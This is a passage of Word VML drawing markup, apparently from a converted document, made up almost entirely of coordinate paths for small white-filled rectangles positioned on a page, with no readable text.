,1039,2646,1039,2646,1039,2646,1040,2646,1040,2646,1040,2646,1040,2646,1040,2646,1041,2646,1041,2646,1041,2646,1042,2646,1042,2646,1042,2646,1043,2646,1043,2646,1044,2646,1044,2646,1045,2646,1045,2646,1046,2646,1046,2646,1047,2646,1047,2646,1048,2646,1049,2646,1050,2646,1050,2646,1051,2646,1052,2646,1053,2646,1054,2646,1055,2646,1056,2646,1057,2646,1058,2646,1059,2646,1060,2646,1061,2646,1063,2646,1064,2646,1065,2646,1067,2646,1068,2646,1070,2646,1071,2646,1073,2646,1074,2646,1076,2646,1078,2646,1080,2646,1081,2646,1083,2646,1085,2646,1087,2646,1089,2646,1091,2646,1094,2646,1096,2646,1098,2646,1100,2646,1103,2646,1105,2646,1108,2646,1111,2646,1113,2646,1116,2646,1119,2646,1122,2646,1125,2646,1128,2646,1131,2646,1134,2646,1137,2646,1140,2646,1144,2646,1147,2646,1151,2646,1154,2646,1158,2646,1162,2646,1165,2646,1169,2646,1173,2646,1177,2646,1181,2646,1186,2646,1190,2646,1194,2646,1199,2646,1203,2646,1208,2646,1213,2646,1217,2646,1222,2646,1227,2646,1232,2646,1237,2646,1243,2646,1248,2646,1253,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2646,1259,2645,1259,2645,1259,2645,1259,2645,1259,2645,1259,2645,1259,2645,1259,2644,1259,2644,1259,2644,1259,2644,1259,2643,1259,2643,1259,2643,1259,2643,1259,2642,1259,2642,1259,2642,1259,2641,1259,2641,1259,2641,1259,2640,1259,2640,1259,2640,1259,2639,1259,2639,1259,2638,1259,2638,1259,2637,1259,2637,1259,2636,1259,2636,1259,2635,1259,2634,1259,2634,1259,2633,1259,2632,1259,2632,1259,2631,1259,2630,1259,2629,1259,2629,1259,2628,1259,2627,1259,2626,1259,2625,1259,2624,1259,2623,1259,2622,1259,2621,1259,2620,1259,2619,1259,2618,1259,2617,1259,2616,1259,2615,1259,2614,1259,2612,1259,2611,1259,2610,1259,2609,1259,2607,1259,2606,1259,2604,1259,2603,1259,2601,1259,2600,1259,2598,1259,2597,1259,2595,1259,2594,1259,2592,1259,2590,1259,2588,1259,2587,1259,2585,1259,2583,1259,2581,1259,2579,1259,2577,1259,2575,1259,2573,1259,2571,1259,2569,1259,2567,1259,2564,1259,2562,1259,2560,1259,2558,1259,2555,1259,2553,1259,2550,1259,2548,1259,2545,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1259,2543,1258,2543,1258,2543,1258,2543,1258,2543,1258,2543,1258,2543,1258,2543,1258,2543,1257,2543,1257,2543,1257,2543,1257,2543,1257,2543,1256,2543,1256,2543,1256,2543,1255,2543,1255,2543,1255,2543,1254,2543,1254,2543,1253,2543,1253,2543,1252,2543,1252,2543,1251,2543,1250,2543,1250,2543,1249,2543,1248,2543,1248,2543,1247,2543,1246,2543,1245,2543,1244,2543,1243,2543,1242,2543,1241,2543,1240,2543,1239,2543,1238,2543,1237,2543,1236,2543,1235,2543,1233,2543,1232,2543,1231,2543,1229,2543,1228,2543,1226,2543,1225,2543,1223,2543,1221,2543,1220,2543,1218,2543,1216,2543,1214,2543,1212,2543,1210,2543,1208,2543,1206,2543,1204,2543,1201,2543,1199,2543,1197,2543,1194,2543,1192,2543,1189,2543,1187,2543,1184,2543,1181,2543,1179,2543,1176,2543,1173,2543,1170,2543,1167,2543,1163,2543,1160,2543,1157,2543,1154,2543,1150,2543,1147,2543,1143,2543,1139,2543,1136,2543,1132,2543,1128,2543,1124,2543,1120,2543,1116,2543,1112,2543,1107,2543,1103,2543,1099,2543,1094,2543,1089,2543,1085,2543,1080,2543,1075,2543,1070,2543,1065,2543,1060,2543,1055,2543,1049,2543,1044,2543,1038e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:78.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,1570" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:1570;width:110;height:230" coordorigin="2110,1570" coordsize="110,230" path="m2128,1596l2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2128,1596,2129,1596,2129,1596,2129,1596,2129,1596,2129,1596,2129,1596,2129,1596,2129,1596,2130,1596,2130,1596,2130,1596,2130,1596,2131,1596,2131,1596,2131,1596,2131,1596,2132,1596,2132,1596,2132,1596,2133,1596,2133,1596,2133,1596,2134,1596,2134,1596,2134,1596,2135,1596,2135,1596,2136,1596,2136,1596,2137,1596,2137,1596,2138,1596,2138,1596,2139,1596,2140,1596,2140,1596,2141,1596,2142,1596,2142,1596,2143,1596,2144,1596,2145,1596,2145,1596,2146,1596,2147,1596,2148,1596,2149,1596,2150,1596,2151,1596,2152,1596,2153,1596,2154,1596,2155,1596,2156,1596,2157,1596,2158,1596,2159,1596,2160,1596,2162,1596,2163,1596,2164,1596,2165,1596,2167,1596,2168,1596,2170,1596,2171,1596,2173,1596,2174,1596,2176,1596,2177,1596,2179,1596,2180,1596,2182,1596,2184,1596,2186,1596,2187,1596,2189,1596,2191,1596,2193,1596,2195,1596,2197,1596,2199,1596,2201,1596,2203,1596,2205,1596,2207,1596,2210,1596,2212,1596,2214,1596,2216,1596,2219,1596,2221,1596,2224,1596,2226,1596,2229,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1596,2231,1597,2231,1597,2231,1597,2231,1597,2231,1597,2231,1597,2231,1597,2231,1598,2231,1598,2231,1598,2231,1598,2231,1599,2231,1599,2231,1599,2231,1600,2231,1600,2231,1600,2231,1601,2231,1601,2231,1602,2231,1602,2231,1603,2231,1603,2231,1604,2231,1604,2231,1605,2231,1606,2231,1606,2231,1607,2231,1608,2231,1609,2231,1610,2231,1610,2231,1611,2231,1612,2231,1613,2231,1614,2231,1615,2231,1617,2231,1618,2231,1619,2231,1620,2231,1622,2231,1623,2231,1624,2231,1626,2231,1627,2231,1629,2231,1630,2231,1632,2231,1634,2231,1635,2231,1637,2231,1639,2231,1641,2231,1643,2231,1645,2231,1647,2231,1649,2231,1651,2231,1653,2231,1656,2231,1658,2231,1660,2231,1663,2231,1666,2231,1668,2231,1671,2231,1674,2231,1676,2231,1679,2231,1682,2231,1685,2231,1688,2231,1691,2231,1695,2231,1698,2231,1701,2231,1705,2231,1708,2231,1712,2231,1715,2231,1719,2231,1723,2231,1727,2231,1731,2231,1735,2231,1739,2231,1743,2231,1747,2231,1752,2231,1756,2231,1761,2231,1765,2231,1770,2231,1775,2231,1780,2231,1785,2231,1790,2231,1795,2231,1800,2231,1806,2231,1811,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2231,1816,2230,1816,2230,1816,2230,1816,2230,1816,2230,1816,2230,1816,2230,1816,2229,1816,2229,1816,2229,1816,2229,1816,2229,1816,2228,1816,2228,1816,2228,1816,2227,1816,2227,1816,2227,1816,2227,1816,2226,1816,2226,1816,2225,1816,2225,1816,2225,1816,2224,1816,2224,1816,2223,1816,2223,1816,2222,1816,2222,1816,2221,1816,2221,1816,2220,1816,2219,1816,2219,1816,2218,1816,2217,1816,2217,1816,2216,1816,2215,1816,2214,1816,2214,1816,2213,1816,2212,1816,2211,1816,2210,1816,2209,1816,2208,1816,2207,1816,2206,1816,2205,1816,2204,1816,2203,1816,2202,1816,2201,1816,2200,1816,2199,1816,2197,1816,2196,1816,2195,1816,2194,1816,2192,1816,2191,1816,2189,1816,2188,1816,2187,1816,2185,1816,2183,1816,2182,1816,2180,1816,2179,1816,2177,1816,2175,1816,2173,1816,2172,1816,2170,1816,2168,1816,2166,1816,2164,1816,2162,1816,2160,1816,2158,1816,2156,1816,2154,1816,2152,1816,2149,1816,2147,1816,2145,1816,2143,1816,2140,1816,2138,1816,2135,1816,2133,1816,2130,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1816,2128,1815,2128,1815,2128,1815,2128,1815,2128,1815,2128,1814,2128,1814,2128,1814,2128,1814,2128,1813,2128,1813,2128,1813,2128,1812,2128,1812,2128,1811,2128,1811,2128,1810,2128,1810,2128,1809,2128,1809,2128,1808,2128,1807,2128,1807,2128,1806,2128,1805,2128,1805,2128,1804,2128,1803,2128,1802,2128,1801,2128,1800,2128,1799,2128,1798,2128,1797,2128,1796,2128,1795,2128,1793,2128,1792,2128,1791,2128,1790,2128,1788,2128,1787,2128,1785,2128,1784,2128,1782,2128,1781,2128,1779,2128,1777,2128,1775,2128,1773,2128,1772,2128,1770,2128,1768,2128,1766,2128,1763,2128,1761,2128,1759,2128,1757,2128,1754,2128,1752,2128,1749,2128,1747,2128,1744,2128,1742,2128,1739,2128,1736,2128,1733,2128,1730,2128,1727,2128,1724,2128,1721,2128,1718,2128,1715,2128,1711,2128,1708,2128,1704,2128,1701,2128,1697,2128,1693,2128,1690,2128,1686,2128,1682,2128,1678,2128,1673,2128,1669,2128,1665,2128,1661,2128,1656,2128,1652,2128,1647,2128,1642,2128,1638,2128,1633,2128,1628,2128,1623,2128,1617,2128,1612,2128,1607,2128,1602,2128,1596e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:78.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,1570" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:1570;width:110;height:230" coordorigin="2530,1570" coordsize="110,230" path="m2543,1596l2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2543,1596,2544,1596,2544,1596,2544,1596,2544,1596,2544,1596,2544,1596,2544,1596,2545,1596,2545,1596,2545,1596,2545,1596,2545,1596,2546,1596,2546,1596,2546,1596,2547,1596,2547,1596,2547,1596,2548,1596,2548,1596,2548,1596,2549,1596,2549,1596,2549,1596,2550,1596,2550,1596,2551,1596,2551,1596,2552,1596,2552,1596,2553,1596,2553,1596,2554,1596,2555,1596,2555,1596,2556,1596,2557,1596,2557,1596,2558,1596,2559,1596,2560,1596,2560,1596,2561,1596,2562,1596,2563,1596,2564,1596,2565,1596,2566,1596,2567,1596,2568,1596,2569,1596,2570,1596,2571,1596,2572,1596,2573,1596,2574,1596,2575,1596,2577,1596,2578,1596,2579,1596,2580,1596,2582,1596,2583,1596,2585,1596,2586,1596,2587,1596,2589,1596,2591,1596,2592,1596,2594,1596,2595,1596,2597,1596,2599,1596,2601,1596,2602,1596,2604,1596,2606,1596,2608,1596,2610,1596,2612,1596,2614,1596,2616,1596,2618,1596,2620,1596,2622,1596,2625,1596,2627,1596,2629,1596,2631,1596,2634,1596,2636,1596,2639,1596,2641,1596,2644,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1596,2646,1597,2646,1597,2646,1597,2646,1597,2646,1597,2646,1597,2646,1597,2646,1598,2646,1598,2646,1598,2646,1598,2646,1599,2646,1599,2646,1599,2646,1600,2646,1600,2646,1600,2646,1601,2646,1601,2646,1602,2646,1602,2646,1603,2646,1603,2646,1604,2646,1604,2646,1605,2646,1606,2646,1606,2646,1607,2646,1608,2646,1609,2646,1610,2646,1610,2646,1611,2646,1612,2646,1613,2646,1614,2646,1615,2646,1617,2646,1618,2646,1619,2646,1620,2646,1622,2646,1623,2646,1624,2646,1626,2646,1627,2646,1629,2646,1630,2646,1632,2646,1634,2646,1635,2646,1637,2646,1639,2646,1641,2646,1643,2646,1645,2646,1647,2646,1649,2646,1651,2646,1653,2646,1656,2646,1658,2646,1660,2646,1663,2646,1666,2646,1668,2646,1671,2646,1674,2646,1676,2646,1679,2646,1682,2646,1685,2646,1688,2646,1691,2646,1695,2646,1698,2646,1701,2646,1705,2646,1708,2646,1712,2646,1715,2646,1719,2646,1723,2646,1727,2646,1731,2646,1735,2646,1739,2646,1743,2646,1747,2646,1752,2646,1756,2646,1761,2646,1765,2646,1770,2646,1775,2646,1780,2646,1785,2646,1790,2646,1795,2646,1800,2646,1806,2646,1811,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2646,1816,2645,1816,2645,1816,2645,1816,2645,1816,2645,1816,2645,1816,2645,1816,2644,1816,2644,1816,2644,1816,2644,1816,2643,1816,2643,1816,2643,1816,2643,1816,2642,1816,2642,1816,2642,1816,2641,1816,2641,1816,2641,1816,2640,1816,2640,1816,2640,1816,2639,1816,2639,1816,2638,1816,2638,1816,2637,1816,2637,1816,2636,1816,2636,1816,2635,1816,2634,1816,2634,1816,2633,1816,2632,1816,2632,1816,2631,1816,2630,1816,2629,1816,2629,1816,2628,1816,2627,1816,2626,1816,2625,1816,2624,1816,2623,1816,2622,1816,2621,1816,2620,1816,2619,1816,2618,1816,2617,1816,2616,1816,2615,1816,2614,1816,2612,1816,2611,1816,2610,1816,2609,1816,2607,1816,2606,1816,2604,1816,2603,1816,2601,1816,2600,1816,2598,1816,2597,1816,2595,1816,2594,1816,2592,1816,2590,1816,2588,1816,2587,1816,2585,1816,2583,1816,2581,1816,2579,1816,2577,1816,2575,1816,2573,1816,2571,1816,2569,1816,2567,1816,2564,1816,2562,1816,2560,1816,2558,1816,2555,1816,2553,1816,2550,1816,2548,1816,2545,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1816,2543,1815,2543,1815,2543,1815,2543,1815,2543,1815,2543,1814,2543,1814,2543,1814,2543,1814,2543,1813,2543,1813,2543,1813,2543,1812,2543,1812,2543,1811,2543,1811,2543,1810,2543,1810,2543,1809,2543,1809,2543,1808,2543,1807,2543,1807,2543,1806,2543,1805,2543,1805,2543,1804,2543,1803,2543,1802,2543,1801,2543,1800,2543,1799,2543,1798,2543,1797,2543,1796,2543,1795,2543,1793,2543,1792,2543,1791,2543,1790,2543,1788,2543,1787,2543,1785,2543,1784,2543,1782,2543,1781,2543,1779,2543,1777,2543,1775,2543,1773,2543,1772,2543,1770,2543,1768,2543,1766,2543,1763,2543,1761,2543,1759,2543,1757,2543,1754,2543,1752,2543,1749,2543,1747,2543,1744,2543,1742,2543,1739,2543,1736,2543,1733,2543,1730,2543,1727,2543,1724,2543,1721,2543,1718,2543,1715,2543,1711,2543,1708,2543,1704,2543,1701,2543,1697,2543,1693,2543,1690,2543,1686,2543,1682,2543,1678,2543,1673,2543,1669,2543,1665,2543,1661,2543,1656,2543,1652,2543,1647,2543,1642,2543,1638,2543,1633,2543,1628,2543,1623,2543,1617,2543,1612,2543,1607,2543,1602,2543,1596e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:106.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,2130" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:2130;width:110;height:230" coordorigin="2110,2130" coordsize="110,230" path="m2128,2141l2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2128,2141,2129,2141,2129,2141,2129,2141,2129,2141,2129,2141,2129,2141,2129,2141,2129,2141,2130,2141,2130,2141,2130,2141,2130,2141,2131,2141,2131,2141,2131,2141,2131,2141,2132,2141,2132,2141,2132,2141,2133,2141,2133,2141,2133,2141,2134,2141,2134,2141,2134,2141,2135,2141,2135,2141,2136,2141,2136,2141,2137,2141,2137,2141,2138,2141,2138,2141,2139,2141,2140,2141,2140,2141,2141,2141,2142,2141,2142,2141,2143,2141,2144,2141,2145,2141,2145,2141,2146,2141,2147,2141,2148,2141,2149,2141,2150,2141,2151,2141,2152,2141,2153,2141,2154,2141,2155,2141,2156,2141,2157,2141,2158,2141,2159,2141,2160,2141,2162,2141,2163,2141,2164,2141,2165,2141,2167,2141,2168,2141,2170,2141,2171,2141,2173,2141,2174,2141,2176,2141,2177,2141,2179,2141,2180,2141,2182,2141,2184,2141,2186,2141,2187,2141,2189,2141,2191,2141,2193,2141,2195,2141,2197,2141,2199,2141,2201,2141,2203,2141,2205,2141,2207,2141,2210,2141,2212,2141,2214,2141,2216,2141,2219,2141,2221,2141,2224,2141,2226,2141,2229,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2141,2231,2142,2231,2142,2231,2142,2231,2142,2231,2142,2231,2142,2231,2143,2231,2143,2231,2143,2231,2143,2231,2144,2231,2144,2231,2145,2231,2145,2231,2145,2231,2146,2231,2146,2231,2147,2231,2147,2231,2148,2231,2148,2231,2149,2231,2150,2231,2150,2231,2151,2231,2152,2231,2153,2231,2153,2231,2154,2231,2155,2231,2156,2231,2157,2231,2158,2231,2159,2231,2160,2231,2161,2231,2162,2231,2164,2231,2165,2231,2166,2231,2167,2231,2169,2231,2170,2231,2172,2231,2173,2231,2175,2231,2177,2231,2178,2231,2180,2231,2182,2231,2184,2231,2185,2231,2187,2231,2189,2231,2192,2231,2194,2231,2196,2231,2198,2231,2200,2231,2203,2231,2205,2231,2208,2231,2210,2231,2213,2231,2215,2231,2218,2231,2221,2231,2224,2231,2227,2231,2230,2231,2233,2231,2236,2231,2239,2231,2242,2231,2246,2231,2249,2231,2253,2231,2256,2231,2260,2231,2264,2231,2268,2231,2271,2231,2275,2231,2279,2231,2284,2231,2288,2231,2292,2231,2296,2231,2301,2231,2305,2231,2310,2231,2315,2231,2320,2231,2324,2231,2329,2231,2334,2231,2340,2231,2345,2231,2350,2231,2356,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2231,2361,2230,2361,2230,2361,2230,2361,2230,2361,2230,2361,2230,2361,2230,2361,2229,2361,2229,2361,2229,2361,2229,2361,2229,2361,2228,2361,2228,2361,2228,2361,2227,2361,2227,2361,2227,2361,2227,2361,2226,2361,2226,2361,2225,2361,2225,2361,2225,2361,2224,2361,2224,2361,2223,2361,2223,2361,2222,2361,2222,2361,2221,2361,2221,2361,2220,2361,2219,2361,2219,2361,2218,2361,2217,2361,2217,2361,2216,2361,2215,2361,2214,2361,2214,2361,2213,2361,2212,2361,2211,2361,2210,2361,2209,2361,2208,2361,2207,2361,2206,2361,2205,2361,2204,2361,2203,2361,2202,2361,2201,2361,2200,2361,2199,2361,2197,2361,2196,2361,2195,2361,2194,2361,2192,2361,2191,2361,2189,2361,2188,2361,2187,2361,2185,2361,2183,2361,2182,2361,2180,2361,2179,2361,2177,2361,2175,2361,2173,2361,2172,2361,2170,2361,2168,2361,2166,2361,2164,2361,2162,2361,2160,2361,2158,2361,2156,2361,2154,2361,2152,2361,2149,2361,2147,2361,2145,2361,2143,2361,2140,2361,2138,2361,2135,2361,2133,2361,2130,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2361,2128,2360,2128,2360,2128,2360,2128,2360,2128,2360,2128,2360,2128,2359,2128,2359,2128,2359,2128,2359,2128,2358,2128,2358,2128,2358,2128,2358,2128,2357,2128,2357,2128,2356,2128,2356,2128,2355,2128,2355,2128,2354,2128,2354,2128,2353,2128,2353,2128,2352,2128,2351,2128,2351,2128,2350,2128,2349,2128,2348,2128,2347,2128,2347,2128,2346,2128,2345,2128,2344,2128,2343,2128,2342,2128,2340,2128,2339,2128,2338,2128,2337,2128,2336,2128,2334,2128,2333,2128,2331,2128,2330,2128,2328,2128,2327,2128,2325,2128,2323,2128,2322,2128,2320,2128,2318,2128,2316,2128,2314,2128,2312,2128,2310,2128,2308,2128,2306,2128,2304,2128,2301,2128,2299,2128,2297,2128,2294,2128,2292,2128,2289,2128,2286,2128,2284,2128,2281,2128,2278,2128,2275,2128,2272,2128,2269,2128,2266,2128,2262,2128,2259,2128,2256,2128,2252,2128,2249,2128,2245,2128,2242,2128,2238,2128,2234,2128,2230,2128,2226,2128,2222,2128,2218,2128,2214,2128,2210,2128,2205,2128,2201,2128,2196,2128,2192,2128,2187,2128,2182,2128,2177,2128,2172,2128,2167,2128,2162,2128,2157,2128,2152,2128,2146,2128,2141e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:106.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,2130" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:2130;width:110;height:230" coordorigin="2530,2130" coordsize="110,230" path="m2543,2141l2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2543,2141,2544,2141,2544,2141,2544,2141,2544,2141,2544,2141,2544,2141,2544,2141,2545,2141,2545,2141,2545,2141,2545,2141,2545,2141,2546,2141,2546,2141,2546,2141,2547,2141,2547,2141,2547,2141,2548,2141,2548,2141,2548,2141,2549,2141,2549,2141,2549,2141,2550,2141,2550,2141,2551,2141,2551,2141,2552,2141,2552,2141,2553,2141,2553,2141,2554,2141,2555,2141,2555,2141,2556,2141,2557,2141,2557,2141,2558,2141,2559,2141,2560,2141,2560,2141,2561,2141,2562,2141,2563,2141,2564,2141,2565,2141,2566,2141,2567,2141,2568,2141,2569,2141,2570,2141,2571,2141,2572,2141,2573,2141,2574,2141,2575,2141,2577,2141,2578,2141,2579,2141,2580,2141,2582,2141,2583,2141,2585,2141,2586,2141,2587,2141,2589,2141,2591,2141,2592,2141,2594,2141,2595,2141,2597,2141,2599,2141,2601,2141,2602,2141,2604,2141,2606,2141,2608,2141,2610,2141,2612,2141,2614,2141,2616,2141,2618,2141,2620,2141,2622,2141,2625,2141,2627,2141,2629,2141,2631,2141,2634,2141,2636,2141,2639,2141,2641,2141,2644,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2141,2646,2142,2646,2142,2646,2142,2646,2142,2646,2142,2646,2142,2646,2143,2646,2143,2646,2143,2646,2143,2646,2144,2646,2144,2646,2145,2646,2145,2646,2145,2646,2146,2646,2146,2646,2147,2646,2147,2646,2148,2646,2148,2646,2149,2646,2150,2646,2150,2646,2151,2646,2152,2646,2153,2646,2153,2646,2154,2646,2155,2646,2156,2646,2157,2646,2158,2646,2159,2646,2160,2646,2161,2646,2162,2646,2164,2646,2165,2646,2166,2646,2167,2646,2169,2646,2170,2646,2172,2646,2173,2646,2175,2646,2177,2646,2178,2646,2180,2646,2182,2646,2184,2646,2185,2646,2187,2646,2189,2646,2192,2646,2194,2646,2196,2646,2198,2646,2200,2646,2203,2646,2205,2646,2208,2646,2210,2646,2213,2646,2215,2646,2218,2646,2221,2646,2224,2646,2227,2646,2230,2646,2233,2646,2236,2646,2239,2646,2242,2646,2246,2646,2249,2646,2253,2646,2256,2646,2260,2646,2264,2646,2268,2646,2271,2646,2275,2646,2279,2646,2284,2646,2288,2646,2292,2646,2296,2646,2301,2646,2305,2646,2310,2646,2315,2646,2320,2646,2324,2646,2329,2646,2334,2646,2340,2646,2345,2646,2350,2646,2356,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2646,2361,2645,2361,2645,2361,2645,2361,2645,2361,2645,2361,2645,2361,2645,2361,2644,2361,2644,2361,2644,2361,2644,2361,2643,2361,2643,2361,2643,2361,2643,2361,2642,2361,2642,2361,2642,2361,2641,2361,2641,2361,2641,2361,2640,2361,2640,2361,2640,2361,2639,2361,2639,2361,2638,2361,2638,2361,2637,2361,2637,2361,2636,2361,2636,2361,2635,2361,2634,2361,2634,2361,2633,2361,2632,2361,2632,2361,2631,2361,2630,2361,2629,2361,2629,2361,2628,2361,2627,2361,2626,2361,2625,2361,2624,2361,2623,2361,2622,2361,2621,2361,2620,2361,2619,2361,2618,2361,2617,2361,2616,2361,2615,2361,2614,2361,2612,2361,2611,2361,2610,2361,2609,2361,2607,2361,2606,2361,2604,2361,2603,2361,2601,2361,2600,2361,2598,2361,2597,2361,2595,2361,2594,2361,2592,2361,2590,2361,2588,2361,2587,2361,2585,2361,2583,2361,2581,2361,2579,2361,2577,2361,2575,2361,2573,2361,2571,2361,2569,2361,2567,2361,2564,2361,2562,2361,2560,2361,2558,2361,2555,2361,2553,2361,2550,2361,2548,2361,2545,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2361,2543,2360,2543,2360,2543,2360,2543,2360,2543,2360,2543,2360,2543,2359,2543,2359,2543,2359,2543,2359,2543,2358,2543,2358,2543,2358,2543,2358,2543,2357,2543,2357,2543,2356,2543,2356,2543,2355,2543,2355,2543,2354,2543,2354,2543,2353,2543,2353,2543,2352,2543,2351,2543,2351,2543,2350,2543,2349,2543,2348,2543,2347,2543,2347,2543,2346,2543,2345,2543,2344,2543,2343,2543,2342,2543,2340,2543,2339,2543,2338,2543,2337,2543,2336,2543,2334,2543,2333,2543,2331,2543,2330,2543,2328,2543,2327,2543,2325,2543,2323,2543,2322,2543,2320,2543,2318,2543,2316,2543,2314,2543,2312,2543,2310,2543,2308,2543,2306,2543,2304,2543,2301,2543,2299,2543,2297,2543,2294,2543,2292,2543,2289,2543,2286,2543,2284,2543,2281,2543,2278,2543,2275,2543,2272,2543,2269,2543,2266,2543,2262,2543,2259,2543,2256,2543,2252,2543,2249,2543,2245,2543,2242,2543,2238,2543,2234,2543,2230,2543,2226,2543,2222,2543,2218,2543,2214,2543,2210,2543,2205,2543,2201,2543,2196,2543,2192,2543,2187,2543,2182,2543,2177,2543,2172,2543,2167,2543,2162,2543,2157,2543,2152,2543,2146,2543,2141e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:133.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,2670" coordsize="110,230">
